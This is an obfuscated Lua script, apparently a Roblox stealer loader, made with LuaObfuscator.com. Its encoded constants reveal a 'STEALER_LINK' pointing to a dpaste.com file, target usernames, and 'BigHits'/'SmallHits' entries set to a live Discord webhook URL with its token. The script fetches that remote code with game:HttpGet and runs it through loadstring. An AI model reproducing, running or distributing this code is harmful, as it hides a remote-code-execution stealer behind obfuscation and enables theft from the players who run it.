--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v82=v2(v0(v30,16));if v19 then local v94=v5(v82,v19);v19=nil;return v94;else return v82;end end end);local function v20(v31,v32,v33) if v33 then local v83=0;local v84;while true do if (v83==(0 -0)) then v84=(v31/((5 -3)^(v32-(1 -0))))%((4 -2)^(((v33-((558 + 62) -(555 + 64))) -(v32-(932 -(857 + 74)))) + (569 -((523 -156) + (1266 -(68 + 997)))))) ;return v84-(v84%(928 -(214 + 713))) ;end end else local v85=(1 + 1)^(v32-(1 + 0)) ;return (((v31%(v85 + v85))>=v85) and (878 -(282 + 595))) or ((2907 -(226 + 1044)) -(1523 + 114)) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=0 -0 ;local v36;local v37;while true do if (v35==(118 -(32 + (202 -117)))) then return (v37 * 256) + v36 ;end if (v35==(0 + 0)) then v36,v37=v1(v16,v18,v18 + 1 + 1 );v18=v18 + (959 -((1648 -756) + 65)) ;v35=1;end end end local function v23() local v38=(0 -0) -0 ;local v39;local v40;local v41;local v42;while true do if (v38==((636 -285) -(64 + 23 + 263))) then return (v42 * (16777396 -((1064 -(915 + 82)) + 113))) + (v41 * (48056 + 17480)) + (v40 * (628 -372)) + v39 ;end if (v38==0) then v39,v40,v41,v42=v1(v16,v18,v18 + 3 + 0 );v18=v18 + (15 -11) ;v38=953 -(802 + 150) ;end end end local function v24() local v43=v23();local v44=v23();local v45=2 -(3 -2) ;local v46=(v20(v44,1 + 0 ,26 -(1144 -(116 + 1022)) ) * ((1189 -(1069 + 118))^(72 -40))) + v43 ;local v47=v20(v44,45 -24 ,6 + (884 -(814 + 45)) );local v48=((v20(v44,56 -24 )==1) and  -(1 + 0)) or (792 -((906 -538) + 423)) ;if (v47==(0 -0)) then if (v46==(18 -(10 + 8))) then return v48 * (0 -0) ;else local v95=(0 + 0) -0 ;while true do if (v95==(442 -(416 + 26))) then v47=(10 -7) -2 ;v45=0 + 0 ;break;end end end elseif (v47==(3621 -1574)) then return ((v46==((155 + 283) -(145 + 293))) and (v48 * ((431 -(44 + 386))/(1486 -(998 + 488))))) or (v48 * NaN) ;end return v8(v48,v47-(325 + 698) ) * (v45 + (v46/((2 + (885 -(261 + 624)))^(824 -(201 + 571))))) ;end local function v25(v49) local v50;if  not v49 then v49=v23();if (v49==(0 -0)) then return "";end end v50=v3(v16,v18,(v18 + v49) -(1081 -(1020 + 60)) );v18=v18 + v49 ;local v51={};for v66=3 -2 , #v50 do v51[v66]=v2(v1(v3(v50,v66,v66)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return 0;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();while true do if (v52==1) then local v89=(function() return 0;end)();local v90=(function() return;end)();while true do if (v89~=(0 -0)) then else v90=(function() return 867 -(550 + 317) ;end)();while true do if (v90~=2) then else v52=(function() return 2 -0 ;end)();break;end if (v90~=(0 -0)) then else v57=(function() return {v54,v55,nil,v56};end)();v58=(function() return v23();end)();v90=(function() return 286 -(134 + 151) ;end)();end if (v90~=(1666 -(970 + 695))) then else v59=(function() return {};end)();for v112= #",",v58 do local v113=(function() return 0;end)();local v114=(function() return;end)();local v115=(function() return;end)();local v116=(function() return;end)();while true do if (v113~=1) then else v116=(function() return nil;end)();while true do if (v114~=1) then else if (v115== #"\\") then v116=(function() return v21()~=0 ;end)();elseif (v115==2) then v116=(function() return v24();end)();elseif (v115== #"19(") then v116=(function() return v25();end)();end v59[v112]=(function() return v116;end)();break;end if ((0 -0)==v114) then local v185=(function() return 1990 -(582 + 1408) ;end)();while true do if (v185~=(3 -2)) then else v114=(function() return 1 -0 ;end)();break;end if (v185==0) then v115=(function() return v21();end)();v116=(function() return nil;end)();v185=(function() return 3 -2 ;end)();end end end end break;end if ((1824 -(1195 + 629))~=v113) then else local v176=(function() return 0 -0 ;end)();while true do if (v176~=1) then else v113=(function() return 242 -(187 + 54) ;end)();break;end if (v176==0) then v114=(function() return 0;end)();v115=(function() return nil;end)();v176=(function() return 781 -(162 + 618) ;end)();end end end end end v90=(function() return 2 + 0 ;end)();end end break;end end end if (v52~=2) then else v57[ #"19("]=(function() return v21();end)();for v96= #",",v23() do local v97=(function() return v21();end)();if (v20(v97, #">", #"/")==(0 + 0)) then local v103=(function() return 0 -0 ;end)();local v104=(function() return;end)();local v105=(function() return;end)();local v106=(function() return;end)();while true do if (v103~=1) then else local v107=(function() return 0 -0 ;end)();local v108=(function() return;end)();while true do if (v107==(0 + 0)) then v108=(function() return 1636 -(1373 + 263) ;end)();while true do if (v108==0) then v106=(function() return {v22(),v22(),nil,nil};end)();if (v104==(0 + 0)) then local v190=(function() return 0 -0 ;end)();while true do if (v190~=(0 -0)) then else v106[ #"gha"]=(function() return v22();end)();v106[ #"?id="]=(function() return v22();end)();break;end end elseif (v104== #"|") then v106[ #"xxx"]=(function() return v23();end)();elseif (v104==2) then v106[ #"91("]=(function() return v23() -((1386 -(746 + 638))^16) ;end)();elseif (v104~= #"-19") then else local v200=(function() return 0 + 0 ;end)();local v201=(function() return;end)();while true do if (0~=v200) then else v201=(function() return 0;end)();while true do if ((0 -0)==v201) then v106[ #"91("]=(function() return v23() -(2^(357 -(218 + 123))) ;end)();v106[ #"xnxx"]=(function() return v22();end)();break;end end break;end end end v108=(function() return 1582 -(1535 + 46) ;end)();end if (v108==(1 + 0)) then v103=(function() return 1 + 1 ;end)();break;end end break;end end end if (v103~=(562 -(306 + 254))) then else if (v20(v105, #" ", #"]")~= #"}") then else v106[1 + 1 ]=(function() return v59[v106[2]];end)();end if (v20(v105,3 -1 ,2)~= #"/") then else v106[ #"91("]=(function() return v59[v106[ #"xnx"]];end)();end v103=(function() return 1470 -(899 + 568) ;end)();end if ((0 + 0)==v103) then local v109=(function() return 0;end)();local v110=(function() return;end)();while true do if (v109==(0 -0)) then v110=(function() return 0;end)();while true do if ((603 -(268 + 335))~=v110) then else local v181=(function() return 290 -(60 + 230) ;end)();while true do if (v181~=1) then else v110=(function() return 1;end)();break;end if (v181~=(572 -(426 + 146))) then else v104=(function() return v20(v97,1 + 1 , #"19(");end)();v105=(function() return v20(v97, #"?id=",1462 -(282 + 1174) );end)();v181=(function() return 812 -(569 + 242) ;end)();end end end if (1~=v110) then else v103=(function() return 1;end)();break;end end break;end end end if (v103==3) then if (v20(v105, #"-19", #"xxx")~= #"!") then else v106[ #"http"]=(function() return v59[v106[ #"xnxx"]];end)();end v54[v96]=(function() return v106;end)();break;end end end end for v98= #":",v23() do v55,v98,v28=(function() return v53(v55,v98,v28);end)();end return v57;end if (0~=v52) then else local v92=(function() return 0 -0 ;end)();local v93=(function() return;end)();while true do if (v92==0) then v93=(function() return 0;end)();while true do if (v93==1) then v55=(function() return {};end)();v56=(function() return {};end)();v93=(function() return 1 + 1 ;end)();end if ((1026 -(706 + 318))~=v93) then else v52=(function() return 1;end)();break;end if (v93==0) then v53=(function() return function(v137,v138,v139) local v140=(function() return 0;end)();while true do if (v140==(1251 -(721 + 530))) then local v180=(function() return 0;end)();while true do if (v180~=0) then else v137[v138-#"}" ]=(function() return v139();end)();return v137,v138,v139;end end end end end;end)();v54=(function() return {};end)();v93=(function() return 1272 -(945 + 326) ;end)();end end break;end end end end end local function v29(v60,v61,v62) local v63=v60[2 -1 ];local v64=v60[2];local v65=v60[(6 -3) + 0 ];return function(...) local v68=v63;local v69=v64;local v70=v65;local v71=v27;local v72=1;local v73= -(701 -(271 + 429));local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v86=1500 -(1408 + 92) ,v76 do if ((v86>=v70) or (2087>2372)) then v74[v86-v70 ]=v75[v86 + (1087 -(461 + 625)) ];else v78[v86]=v75[v86 + (1289 -(993 + 295)) ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1 + 0 ];if (v81<=((2644 -1463) -(418 + 753))) then if (v81<=(2 + 2)) then if (v81<=(1 + 0)) then if ((v81==(0 + 0)) or (4445<4149)) then local v117=v80[1 + 1 ];local v118=v78[v80[3]];v78[v117 + 1 ]=v118;v78[v117]=v118[v80[533 -(406 + 123) ]];else v78[v80[1771 -(1749 + 20) ]]=v80[1 + 2 ]~=(1322 -(1249 + 73)) ;end elseif (v81<=(1 + 1)) then do return;end elseif (v81==(1148 -(466 + 679))) then local v145=v80[4 -2 ];local v146=v78[v80[8 -5 ]];v78[v145 + (1901 -(106 + 1794)) ]=v146;v78[v145]=v146[v80[2 + 2 ]];else v78[v80[1 + 1 + 0 ]]=v62[v80[8 -5 ]];end elseif (v81<=7) then if (v81<=(13 -8)) then v78[v80[9 -7 ]]={};elseif ((v81>(120 -(4 + 110))) or (1818==85)) then do return;end else v62[v80[587 -((810 -(239 + 514)) + 527) ]]=v78[v80[2]];end elseif ((630<2127) and (v81<=((504 + 931) -(41 + 1386)))) then local v124=v80[(1434 -(797 + 532)) -(17 + 86) ];v78[v124]=v78[v124](v13(v78,v124 + 1 + 0 ,v73));elseif (v81>((14 + 5) -10)) then local v154=0;local v155;local v156;local v157;local v158;while true do if ((v154==((2 + 3) -3)) or (1938==2514)) then for v186=v155,v73 do local v187=0 -0 ;while true do if ((4255>=55) and (v187==(166 -(122 + 44)))) then v158=v158 + 1 ;v78[v186]=v156[v158];break;end end end break;end if (0==v154) then v155=v80[2 -0 ];v156,v157=v71(v78[v155](v13(v78,v155 + ((1205 -(373 + 829)) -2) ,v80[3 + 0 ])));v154=(732 -(476 + 255)) + 0 ;end if (v154==(1 -0)) then v73=(v157 + v155) -(66 -((1160 -(369 + 761)) + 35)) ;v158=0 + 0 ;v154=2;end end else local v159=v80[2];v78[v159]=v78[v159](v13(v78,v159 + ((728 + 530) -(1043 + 214)) ,v73));end elseif (v81<=(60 -44)) then if (v81<=(1225 -((586 -263) + 889))) then if (v81<=11) then v78[v80[(9 -4) -(241 -(64 + 174)) ]]={};elseif (v81==12) then v78[v80[2]]=v80[3]~=(580 -(361 + 219)) ;else v62[v80[323 -(53 + 267) ]]=v78[v80[1 + 1 ]];end elseif (v81<=14) then local v127=v80[2];local v128=v78[v127];local v129=v80[(60 + 356) -(15 + (588 -190)) ];for v141=983 -(18 + 964) ,v129 do v128[v141]=v78[v127 + v141 ];end elseif (v81>(56 -41)) then local v164=0 + 0 ;local v165;local v166;local v167;local v168;while true do if ((2999>1156) and (v164==0)) then v165=v80[338 -(144 + 192) ];v166,v167=v71(v78[v165](v13(v78,v165 + 1 + 0 ,v80[853 -(20 + 830) ])));v164=1 + 0 ;end if (v164==((344 -(42 + 174)) -(116 + 10))) then for v188=v165,v73 do local v189=0 + 0 ;while true do if (v189==(738 -(542 + 196))) then v168=v168 + 1 ;v78[v188]=v166[v168];break;end end end break;end if ((2350>1155) and (v164==(1 -(0 + 0)))) then v73=(v167 + v165) -(1 + 0) ;v168=0 + 0 + 0 + 0 ;v164=1 + 1 ;end end else local v169=v80[4 -(1506 -(363 + 1141)) ];local v170=v78[v169];local v171=v80[7 -4 ];for v177=(3132 -(1183 + 397)) -(1126 + 425) ,v171 do v170[v177]=v78[v169 + v177 ];end end elseif (v81<=19) then if (v81<=17) then v78[v80[407 -(118 + 287) ]]=v62[v80[11 -8 ]];elseif (v81>(1139 -(118 + 1003))) then v78[v80[5 -3 ]]();else v78[v80[379 -(142 + 235) ]]=v80[13 -10 ];end elseif (v81<=(5 + (45 -30))) then local v132=v80[979 -(553 + 424) ];local v133=v78[v132];for v144=v132 + (1 -(0 + 0)) ,v80[3 + 0 ] do v7(v133,v78[v144]);end elseif ((4029<=4853) and (v81>21)) then v78[v80[2 + 0 + 0 ]]();else v78[v80[2 + 0 ]]=v80[2 + (1976 -(1913 + 62)) ];end v72=v72 + 1 + 0 + 0 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0C3Q00030C3Q00535445414C45525F4C494E4B03203Q00682Q7470733A2Q2F6470617374652E636F6D2F32393539474B4D4B452E74787403093Q00557365726E616D6573030A3Q004A7574735069636B6572030C3Q004A7574735069636B65723032030C3Q004A7574735069636B65723033030E3Q0042696748697473576562682Q6F6B03793Q00682Q7470733A2Q2F646973636F72642E636F6D2F6170692F776562682Q6F6B732F312Q33383436343132353937333639323439382F54556F7938795779616342554B744C7A56442Q6B344174726B52333146494E654150644763547576536252373268395A313554356F72343073513233625167505349396F03103Q00536D612Q6C48697473576562682Q6F6B030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657400153Q002Q123Q00023Q0012063Q00014Q00053Q00033Q002Q12000100043Q002Q12000200053Q002Q12000300064Q000E3Q000300010012063Q00033Q002Q123Q00083Q0012063Q00073Q002Q123Q00083Q0012063Q00093Q0012043Q000A3Q0012040001000B3Q00200300010001000C002Q12000300024Q000100046Q0010000100044Q00095Q00022Q00133Q000100012Q00073Q00017Q00",v9(),...);
